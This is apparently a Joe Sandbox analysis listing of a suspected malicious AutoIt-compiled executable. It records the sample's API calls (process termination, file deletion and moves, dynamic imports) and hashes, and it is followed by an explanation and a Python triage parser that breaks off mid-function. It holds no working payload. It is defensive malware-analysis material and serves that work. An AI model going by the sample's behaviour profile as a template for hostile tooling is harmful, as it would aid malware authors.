• SetLastError.KERNEL32(00000000,?,?,?,?,0047E6D1,?,00518A48,00000010,00454F4A,?,?,00000000,00493CD6), ref: 00482DEC
• _abort.LIBCMT ref: 00482DF2
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0

APIs
  • Part of subcall function 00469639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696A2
  • Part of subcall function 00469639: BeginPath.GDI32(?), ref: 004696B9
  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696E2
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004E8A4E
• LineTo.GDI32(?,00000003,00000000), ref: 004E8A62
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004E8A70
• LineTo.GDI32(?,00000000,00000003), ref: 004E8A80
• EndPath.GDI32(?), ref: 004E8A90
• StrokePath.GDI32(?), ref: 004E8AA0
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0

APIs
• GetDC.USER32(00000000), ref: 004B5218
• GetDeviceCaps.GDI32(00000000,00000058), ref: 004B5229
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B5230
• ReleaseDC.USER32(00000000,00000000), ref: 004B5238
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 004B524F
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 004B5261
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0

APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00451BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00451BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00451C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00451C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00451C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00451C22
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004BEB30
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004BEB46
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 004BEB55
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB64
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB6E
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004BEB75
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                APIs
                                                                                • GetClientRect.USER32(?), ref: 004A7452
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 004A7469
                                                                                • GetWindowDC.USER32(?), ref: 004A7475
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 004A7484
                                                                                • ReleaseDC.USER32(?,00000000), ref: 004A7496
                                                                                • GetSysColor.USER32(00000005), ref: 004A74B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                • String ID:
                                                                                • API String ID: 272304278-0
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B187F
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 004B188B
                                                                                • CloseHandle.KERNEL32(?), ref: 004B1894
                                                                                • CloseHandle.KERNEL32(?), ref: 004B189C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B18A5
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B18AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0045BEB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: D%R$D%R$D%R$D%RD%R
                                                                                • API String ID: 1385522511-3290291051
                                                                                APIs
                                                                                  • Part of subcall function 00470242: EnterCriticalSection.KERNEL32(0052070C,00521884,?,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047024D
                                                                                  • Part of subcall function 00470242: LeaveCriticalSection.KERNEL32(0052070C,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047028A
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                • __Init_thread_footer.LIBCMT ref: 004D7BFB
                                                                                  • Part of subcall function 004701F8: EnterCriticalSection.KERNEL32(0052070C,?,?,00468747,00522514), ref: 00470202
                                                                                  • Part of subcall function 004701F8: LeaveCriticalSection.KERNEL32(0052070C,?,00468747,00522514), ref: 00470235
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                • String ID: +TJ$5$G$Variable must be of type 'Object'.
                                                                                • API String ID: 535116098-1441542163
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004BC6EE
                                                                                • _wcslen.LIBCMT ref: 004BC735
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004BC79C
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004BC7CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                • String ID: 0
                                                                                • API String ID: 1227352736-4108050209
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 004DAEA3
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • GetProcessId.KERNEL32(00000000), ref: 004DAF38
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DAF67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                • String ID: <$@
                                                                                • API String ID: 146682121-1426351568
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B7206
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004B723C
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004B724D
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B72CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E3E35
                                                                                • IsMenu.USER32(?), ref: 004E3E4A
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E3E92
                                                                                • DrawMenuBar.USER32 ref: 004E3EA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                • String ID: 0
                                                                                • API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004B1E66
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004B1E79
• SendMessageW.USER32(?,00000189,?,00000000), ref: 004B1EA9
  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: 0e907d4eb9f6edd4fd630adf3ad6fef206bdf8706652f1697fbe485712b9513f
• Instruction ID: 29ae5983d59f8c8eff1cb95b91d2f8d5b20e3181e606a262d666a3bd0fdc81d5
• Opcode Fuzzy Hash: 0e907d4eb9f6edd4fd630adf3ad6fef206bdf8706652f1697fbe485712b9513f
• Instruction Fuzzy Hash: 56212671A00144AADB14ABA5DC95CFFBBB9EF41354B50412FFC11A72E2DB3C8D0A9638
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: _wcslen
• String ID: HKEY_LOCAL_MACHINE$HKLM
• API String ID: 176396367-4004644295
• Opcode ID: 8477d459ce17ef054e3cb2b6426fc654ddf56e6647323442e76789de4644a013
• Instruction ID: e6669fe26a4db1697de1e7b48ffc4a583b23b23c289d6760a2292d4674c607c8
• Opcode Fuzzy Hash: 8477d459ce17ef054e3cb2b6426fc654ddf56e6647323442e76789de4644a013
• Instruction Fuzzy Hash: 2D31F772A0016B8BCB20DE6D89E02BF37A15BA1794B05401BE8456B345E678CD84D3A8
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004E2F8D
• LoadLibraryW.KERNEL32(?), ref: 004E2F94
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004E2FA9
• DestroyWindow.USER32(?), ref: 004E2FB1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 849049d0c7ec15f651841964812cd456d54ec8580d79f91ef56eae38e7181b0f
• Instruction ID: e7856e802e3b23f4a36c8234e09159df32922829e39b2f19d5cfe6d893aee216
• Opcode Fuzzy Hash: 849049d0c7ec15f651841964812cd456d54ec8580d79f91ef56eae38e7181b0f
• Instruction Fuzzy Hash: 2321F371600285ABEB104F66DD80FBB37BDFF59329F10022AF910D6290D7B5DC51A768
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00474D1E,004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002), ref: 00474D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00474DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,00474D1E,004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000), ref: 00474DC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: cf5a45ddad33a79fc863c7f1c7b6b8c73d56e1da3e7564f10386378fab467967
• Instruction ID: 3ef788440981f6b8aea911efdcba22fa167630ef685cfca05edfb768fe5731b2
• Opcode Fuzzy Hash: cf5a45ddad33a79fc863c7f1c7b6b8c73d56e1da3e7564f10386378fab467967
• Instruction Fuzzy Hash: E7F04434540208BBDB115F90DC89BEEBFF5EF44752F0041A9F909A6251DB355941DA98
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00454EAE
• FreeLibrary.KERNEL32(00000000,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: f4e450fa4208dfaf72deff573a77bc24d99164436a025f67b42970810928f124
• Instruction ID: 31f045f5be5f7d6e093344b38797d584aba256231469b0bdbaf916404625b50d
• Opcode Fuzzy Hash: f4e450fa4208dfaf72deff573a77bc24d99164436a025f67b42970810928f124
• Instruction Fuzzy Hash: C2E08635A016225B922117256C99B5BA654AFC2F677050126FC00DB206DB68CD4644A8
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00454E74
• FreeLibrary.KERNEL32(00000000,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E87
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: bb450ee11cd9d006db0c38fce0f06f49a7092d028197165edf19d20fbd56a869
• Instruction ID: 24baf2896b9e75f0fcc698adcd0e9b0ced203b1767472a4d630d714f5f36501a
• Opcode Fuzzy Hash: bb450ee11cd9d006db0c38fce0f06f49a7092d028197165edf19d20fbd56a869
• Instruction Fuzzy Hash: B2D0C2319026615B56221B257C99E8BAA18AFC1F263050226BC00AE216CF28CD42C9DC
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2C05
• DeleteFileW.KERNEL32(?), ref: 004C2C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004C2C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2CC0
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: a26b44a963addafbf23043b38295ec1bb2fb3d4607db718e5b1a1a725b60bfb6
• Instruction ID: 1d3678c79605a83571f4095e746ea91141dc5ac6b2a73ca7d87cf5b56c946261
• Opcode Fuzzy Hash: a26b44a963addafbf23043b38295ec1bb2fb3d4607db718e5b1a1a725b60bfb6
• Instruction Fuzzy Hash: 95B16F75D00119ABDF11DFA5CD85EEEBB7DEF08314F0040ABFA09E6141EAB89A448F65
APIs
• GetCurrentProcessId.KERNEL32 ref: 004DA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004DA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 004DA468
• CloseHandle.KERNEL32(?), ref: 004DA63D
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 74a0f5c7fd617eb46eb9ecbc5e500c10d7b58348ac4fec99156651eb6ba6e3a8
• Instruction ID: 5cc2542883f451fd78208666819e5163888eca5478cb5aa47287c4518f9d953a
• Opcode Fuzzy Hash: 74a0f5c7fd617eb46eb9ecbc5e500c10d7b58348ac4fec99156651eb6ba6e3a8
• Instruction Fuzzy Hash: 95A1A171604300AFD720DF25D892B2AB7E1AF84718F14885EF9999B3D2DB74EC45CB86
APIs
  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004BCF22,?), ref: 004BDDFD
  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004BCF22,?), ref: 004BDE16
  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
• lstrcmpiW.KERNEL32(?,?), ref: 004BE473
• MoveFileW.KERNEL32(?,?), ref: 004BE4AC
• _wcslen.LIBCMT ref: 004BE5EB
• _wcslen.LIBCMT ref: 004BE603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004BE650
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: de29c65b8caffd267e82e24e39eb8bd01f2b2a9946fb14cc57e461e5763d3fe9
• Instruction ID: 63a997946a9391f2d5726b5e574654bff86630157ad568f1c5bde9c77e6066b1
• Opcode Fuzzy Hash: de29c65b8caffd267e82e24e39eb8bd01f2b2a9946fb14cc57e461e5763d3fe9
• Instruction Fuzzy Hash: FB5151B24083859BC724EBA5DC819DB73DCAFC4344F00492FF68993152EF78A588876E
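The blocks above are the sandbox's per-function listing: recovered API call sites with their arguments, the string constants each function references, and opcode and instruction hashes for matching the function across samples. Two points matter when triaging from this listing. First, the ">>>AUTOIT NO CMDEXECUTE<<<" argument visible in the two Wow64 blocks is an AutoIt interpreter string, so the LoadLibraryA("kernel32.dll") / GetProcAddress("Wow64DisableWow64FsRedirection" or "Wow64RevertWow64FsRedirection") / FreeLibrary pairs, like the registry enumeration and file move helpers, belong to the AutoIt runtime compiled into the executable rather than to the script it carries; their Opcode and Instruction Fuzzy Hashes and API String IDs will therefore match any AutoIt-compiled binary of the same runtime version and do not single out this sample. Second, the SendMessageW message numbers only become readable once decoded: 0x188, 0x189 and 0x18A beside the ComboBox$ListBox strings are LB_GETCURSEL, LB_GETTEXT and LB_GETTEXTLEN, and 0x467 beside SysAnimate32 is ACM_OPENW. The following Python script is added here as an example and is not Joe Sandbox's own tooling: it parses blocks in this format into records, tags the API patterns seen above (dynamic import resolution, WOW64 redirection strings, registry access, file operations, window messages, process-handle use), and indexes blocks by API String ID so two reports can be compared. The text in SAMPLE_REPORT is copied from two of the blocks above; the tag rules and the message-number table are the example's own choices.

```python
"""Added example, not Joe Sandbox's code: parse this listing's per-function
"APIs" / "Similarity" blocks into records and tag them for triage. SAMPLE_REPORT
is two blocks copied from this page; the tag rules are this example's own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00454EAE
• FreeLibrary.KERNEL32(00000000,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EC0
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004B1E66
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004B1E79
• SendMessageW.USER32(?,00000189,?,00000000), ref: 004B1EA9
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
"""

# "• Name.MODULE(args), ref: ADDR"; CRT helpers lack the parens and the comma
# ("_wcslen.LIBCMT ref: 00459CBD"); sub-call entries name the callee address.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
KV_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")
WINDOW_MESSAGES = {0x0188: "LB_GETCURSEL", 0x0189: "LB_GETTEXT",  # winuser.h
                   0x018A: "LB_GETTEXTLEN", 0x0467: "ACM_OPENW"}  # commctrl.h

@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]           # "?" = argument the sandbox could not recover
    ref: str                        # call-site address
    via_subcall: str | None = None  # set for "Part of subcall function" entries

@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # "Similarity" key/values

    def direct_calls(self) -> list[ApiCall]:
        return [c for c in self.calls if c.via_subcall is None]

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Start a record at every "APIs" heading and parse the bullets under it."""
    blocks: list[FunctionBlock] = []
    current: FunctionBlock | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
        elif current is None or not line.startswith("•"):
            continue  # "Strings", "Similarity", ... headings carry no data themselves
        elif m := API_LINE.match(line):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["caller"]))
        elif m := KV_LINE.match(line):
            k, v = m["key"], m["value"]
            current.meta[k] = f"{current.meta[k]}; {v}" if k in current.meta else v
    return blocks

def triage(block: FunctionBlock) -> list[str]:
    """Tags an analyst reads first, in a fixed order so two reports compare cleanly."""
    direct = block.direct_calls()
    names = {c.api for c in direct}
    tags: list[str] = []
    if "GetProcAddress" in names and names & {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleExW"}:
        wanted = [c.args[1] for c in direct if c.api == "GetProcAddress" and len(c.args) > 1]
        tags.append("dynamic-import:" + ",".join(wanted))
    if "Wow64" in block.meta.get("String ID", ""):
        tags.append("wow64-fs-redirection")
    if any(c.module == "ADVAPI32" and c.api.startswith("Reg") for c in direct):
        tags.append("registry")
    if names & {"CopyFileW", "DeleteFileW", "MoveFileW", "SHFileOperationW"}:
        tags.append("file-ops")
    if "SendMessageW" in names:  # the message number is the second argument
        nums = {int(c.args[1], 16) for c in direct
                if c.api == "SendMessageW" and len(c.args) > 1 and c.args[1] != "?"}
        tags.append("window-msg:" + ",".join(WINDOW_MESSAGES.get(n, f"0x{n:04X}") for n in sorted(nums)))
    if "OpenProcess" in names:
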